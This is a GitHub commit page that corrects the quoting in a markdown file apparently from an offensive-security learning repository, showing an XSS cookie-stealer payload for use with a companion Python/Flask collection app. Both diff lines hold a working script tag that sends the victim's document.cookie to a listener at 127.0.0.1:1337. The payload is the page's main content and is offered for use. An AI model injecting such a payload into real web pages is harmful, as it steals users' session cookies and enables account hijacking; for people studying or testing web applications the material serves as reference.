Skip to content

Commit

Permalink
Update cookie_stealer_payload.md
Browse files Browse the repository at this point in the history
  • Loading branch information
santosomar authored Mar 27, 2021
1 parent e858a20 commit b632881
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions web_application_testing/cookie_stealer_payload.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,5 +2,5 @@
This is the payload that can be used with the [cookie stealer Python/Flask app](https://github.com/The-Art-of-Hacking/h4cker/blob/master/python_ruby_and_bash/cookie_stealer.py).

```
<script type=text/javascript>document.location=http://127.0.0.1:1337/?c=+document.cookie;</script>
```
<script type="text/javascript">document.location="http://127.0.0.1:1337/?c="+document.cookie;</script>
```

0 comments on commit b632881

Please sign in to comment.